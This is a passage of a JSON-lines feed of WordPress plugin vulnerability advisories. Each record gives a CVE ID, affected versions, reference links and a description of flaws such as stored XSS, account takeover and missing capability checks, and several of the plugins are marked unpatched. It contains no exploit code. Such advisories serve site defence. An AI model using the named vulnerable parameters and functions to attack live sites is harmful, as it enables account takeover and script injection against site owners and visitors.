page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71d8a8cf-4653-4515-95ce-8d71697e189c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71d8a8cf-4653-4515-95ce-8d71697e189c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/trunk\\\/modules\\\/widgets\\\/tp_page_scroll.php#L1017\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/trunk\\\/modules\\\/widgets\\\/tp_page_scroll.php#L1017\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/the-plus-addons-for-elementor-page-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/the-plus-addons-for-elementor-page-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136509\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136509\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12590","slug":"wp-youtube-gallery","versionImpact":"1.9","description":"The WP Youtube Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter in all versions up to, and including, 1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-youtube-gallery\\\/trunk\\\/wpyg-class.php#L87\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-youtube-gallery\\\/trunk\\\/wpyg-class.php#L87\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-youtube-gallery\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-youtube-gallery\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b9e6f21-4c26-4ff8-9d0f-c66cd537fdcc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b9e6f21-4c26-4ff8-9d0f-c66cd537fdcc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23614","slug":"wp-additional-logins","versionImpact":"1.0.0","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Nik Sudan WordPress Additional Logins allows Reflected XSS. This issue affects WordPress Additional Logins: from n\/a through 1.0.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-additional-logins\\\/vulnerability\\\/wordpress-wordpress-additional-logins-plugin-1-0-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-additional-logins\\\/vulnerability\\\/wordpress-wordpress-additional-logins-plugin-1-0-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12069","slug":"lexicata","versionImpact":"1.0.16","description":"The Lexicata plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.0.16. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that execute if they can successfully trick a user into performing an action, such as clicking on a specially crafted link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lexicata\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lexicata\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7541a595-aae4-49d2-862a-c1d1f4a1e6e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7541a595-aae4-49d2-862a-c1d1f4a1e6e5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9658","slug":"school-management","versionImpact":"93.0.0","description":"The School Management System for Wordpress plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 93.0.0. This is due to the plugin not properly validating a user's identity prior to updating their details like email and password through the mj_smgt_update_user() and mj_smgt_add_admission() functions, along with a local file inclusion vulnerability. This makes it possible for authenticated attackers, with student-level access and above, to change arbitrary user's email addresses and passwords, including administrators, and leverage that to gain access to their account. This was escalated four months ago after no response to our initial outreach, yet it is still vulnerable.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5fd7bca-7754-4f83-8e51-5278e6e8cc78?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5fd7bca-7754-4f83-8e51-5278e6e8cc78?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2110","slug":"wp-compress-image-optimizer","versionImpact":"6.30.15","description":"The WP Compress \u2013 Instant Performance & Speed Optimization plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to missing capability checks on its AJAX functions in all versions up to, and including, 6.30.15. This makes it possible for authenticated attackers, with Subscriber-level access and above, to compromise the site in various ways depending on the specific function exploited - for example, by retrieving sensitive settings and configuration details, or by altering and deleting them, thereby disclosing sensitive information, disrupting the plugin\u2019s functionality, and potentially impacting overall site performance.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-compress-image-optimizer\\\/tags\\\/6.30.15\\\/classes\\\/ajax.class.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-compress-image-optimizer\\\/tags\\\/6.30.15\\\/classes\\\/ajax.class.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3254259\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3254259\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-compress-image-optimizer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-compress-image-optimizer\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2bb4ead4-b2ad-42b4-92a0-fb7293f6df06?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2bb4ead4-b2ad-42b4-92a0-fb7293f6df06?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3604","slug":"flynax-bridge","versionImpact":"2.2.0","description":"The Flynax Bridge plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 2.2.0. This is due to the plugin not properly validating a user's identity prior to updating their details like email. This makes it possible for unauthenticated attackers to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flynax-bridge\\\/trunk\\\/request.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flynax-bridge\\\/trunk\\\/request.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/935caa43-4c75-47ad-a631-63988e21f834?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/935caa43-4c75-47ad-a631-63988e21f834?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4392","slug":"shared-files","versionImpact":"1.7.48","description":"The Shared Files \u2013 Frontend File Upload Form & Secure File Sharing plugin for WordPress is vulnerable to Stored Cross-Site Scripting via html File uploads in all versions up to, and including, 1.7.48 due to insufficient input sanitization and output escaping within the sanitize_file() function. This makes it possible for unauthenticated attackers to bypass the plugin\u2019s MIME-only checks and inject arbitrary web scripts in pages that will execute whenever a user accesses the html file.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/anssilaitila\\\/shared-files\\\/blob\\\/master\\\/admin\\\/class-sf-admin-allow-more-file-types.php\",\"name\":\"https:\\\/\\\/github.com\\\/anssilaitila\\\/shared-files\\\/blob\\\/master\\\/admin\\\/class-sf-admin-allow-more-file-types.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3304053\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3304053\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/shared-files\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/shared-files\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/469a9c8a-0708-4c93-99d8-e9157a1f91f5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/469a9c8a-0708-4c93-99d8-e9157a1f91f5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1925","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the wpfc_clear_cache_of_allsites_callback function. This makes it possible for unauthenticated attackers to clear caches via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/096257a4-6ee9-41e1-8a59-4ffcd309f83c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/096257a4-6ee9-41e1-8a59-4ffcd309f83c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1844","slug":"wp-auto-republish","versionImpact":"1.5.6","description":"The RevivePress \u2013 Keep your Old Content Evergreen plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the import_data and copy_data functions in all versions up to, and including, 1.5.6. This makes it possible for authenticated attackers, with subscriber-level access or higher, to overwrite plugin settings and view them.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63ecb518-50d6-49ad-92e4-c5a7494ced82?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63ecb518-50d6-49ad-92e4-c5a7494ced82?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-auto-republish\\\/trunk\\\/includes\\\/Tools\\\/Database.php#L161\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-auto-republish\\\/trunk\\\/includes\\\/Tools\\\/Database.php#L161\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-auto-republish\\\/trunk\\\/includes\\\/Tools\\\/Database.php#L148\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-auto-republish\\\/trunk\\\/includes\\\/Tools\\\/Database.php#L148\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5763","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.6.2","description":"The The Plus Addons for Elementor \u2013 Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the video_date attribute within the plugin's Video widget in all versions up to, and including, 5.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4eaf4c05-9393-4e44-abd1-8f529b7848b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4eaf4c05-9393-4e44-abd1-8f529b7848b5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.6\\\/modules\\\/widgets\\\/tp_video_player.php?rev=3094329#L1351\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.6\\\/modules\\\/widgets\\\/tp_video_player.php?rev=3094329#L1351\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/the-plus-addons-for-elementor-page-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/the-plus-addons-for-elementor-page-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136509\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136509\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10117","slug":"wp-crowdfunding","versionImpact":"2.1.11","description":"The WP Crowdfunding plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpcf_donate shortcode in all versions up to, and including, 2.1.11 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7813dfdc-06e0-4fa9-aabe-b5b9772368c2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7813dfdc-06e0-4fa9-aabe-b5b9772368c2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-crowdfunding\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-crowdfunding\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174230\\\/#file19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174230\\\/#file19\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174230\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174230\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/docs.themeum.com\\\/wp-crowdfunding\\\/\",\"name\":\"https:\\\/\\\/docs.themeum.com\\\/wp-crowdfunding\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10311","slug":"external-database-based-actions","versionImpact":"0.1","description":"The External Database Based Actions plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 0.1. This is due to a missing capability check in the 'edba_admin_handle' function. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to update the plugin settings and log in as any existing user on the site, such as an administrator.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d41a8c39-8b06-45b2-afe4-8c695faf8cb8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d41a8c39-8b06-45b2-afe4-8c695faf8cb8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/external-database-based-actions\\\/trunk\\\/lib\\\/edba-admin-ajax-controller.php?rev=1785239#L8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/external-database-based-actions\\\/trunk\\\/lib\\\/edba-admin-ajax-controller.php?rev=1785239#L8\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10484","slug":"ultimate-addons-for-gutenberg","versionImpact":"2.16.2","description":"The Spectra \u2013 WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'Team' widget in all versions up to, and including, 2.16.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3180325\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3180325\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-addons-for-gutenberg\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-addons-for-gutenberg\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c218bf5e-b28b-4512-8bc7-7662b4a06f1e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c218bf5e-b28b-4512-8bc7-7662b4a06f1e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11827","slug":"ootb-openstreetmap","versionImpact":"2.8.3","description":"The Out of the Block: OpenStreetMap plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ootb_query shortcode in all versions up to, and including, 2.8.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ootb-openstreetmap\\\/tags\\\/2.8.3\\\/includes\\\/classes\\\/Query.php#L283\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ootb-openstreetmap\\\/tags\\\/2.8.3\\\/includes\\\/classes\\\/Query.php#L283\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ootb-openstreetmap\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ootb-openstreetmap\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c67c958e-1ab2-498c-b665-73e239d0029b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c67c958e-1ab2-498c-b665-73e239d0029b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13536","slug":"1003-mortgage-application","versionImpact":"1.87","description":"The 1003 Mortgage Application plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.87. This is due to the \/inc\/class\/fnm\/export.php file being publicly accessible with error logging enabled. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/1003-mortgage-application\\\/trunk\\\/inc\\\/class\\\/fnm\\\/export.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/1003-mortgage-application\\\/trunk\\\/inc\\\/class\\\/fnm\\\/export.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfbc90b9-af91-49ac-ad3d-a37c17e8ba6d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfbc90b9-af91-49ac-ad3d-a37c17e8ba6d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23588","slug":"best-css-compiler","versionImpact":"2.0.2","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WOW WordPress WOW Best CSS Compiler allows Reflected XSS. This issue affects WOW Best CSS Compiler: from n\/a through 2.0.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/best-css-compiler\\\/vulnerability\\\/wordpress-wow-best-css-compiler-plugin-2-0-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/best-css-compiler\\\/vulnerability\\\/wordpress-wow-best-css-compiler-plugin-2-0-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11778","slug":"embedded-cdn","versionImpact":"1.0.0","description":"The CanadaHelps Embedded Donation Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'embedcdn' shortcode in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedded-cdn\\\/trunk\\\/embedded-cdn.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedded-cdn\\\/trunk\\\/embedded-cdn.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/embedded-cdn\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/embedded-cdn\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f96a607-a655-413d-9faf-304249edefe8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f96a607-a655-413d-9faf-304249edefe8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1913","slug":"product-import-export-for-woo","versionImpact":"2.5.0","description":"The Product Import Export for WooCommerce \u2013 Import Export Product CSV Suite plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.5.0 via deserialization of untrusted input from the 'form_data' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-import-export-for-woo\\\/trunk\\\/admin\\\/modules\\\/import\\\/classes\\\/class-import-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-import-export-for-woo\\\/trunk\\\/admin\\\/modules\\\/import\\\/classes\\\/class-import-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261194\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261194\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-import-export-for-woo\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-import-export-for-woo\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4464bb1-273a-42c4-a7ec-8e123d286963?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4464bb1-273a-42c4-a7ec-8e123d286963?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3603","slug":"flynax-bridge","versionImpact":"2.2.0","description":"The Flynax Bridge plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 2.2.0. This is due to the plugin not properly validating a user's identity prior to updating their details like password. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flynax-bridge\\\/trunk\\\/request.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flynax-bridge\\\/trunk\\\/request.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa8124db-ee6a-481d-88c6-4cc84fefcf1c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa8124db-ee6a-481d-88c6-4cc84fefcf1c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6668","slug":"profilepro","versionImpact":"1.3","description":"The ProfilePro WordPress plugin through 1.3 does not sanitise and escape some parameters and lacks proper access controls, which could allow users with a role as low as subscriber to perform Cross-Site Scripting attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8faf1409-44e6-4ebf-9a68-b5f93a5295e9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8faf1409-44e6-4ebf-9a68-b5f93a5295e9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5116","slug":"wp-plugin-info-card","versionImpact":"5.3.1","description":"The WP Plugin Info Card plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018containerid\u2019 parameter in all versions up to, and including, 5.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This issue is due to an incomplete patch for 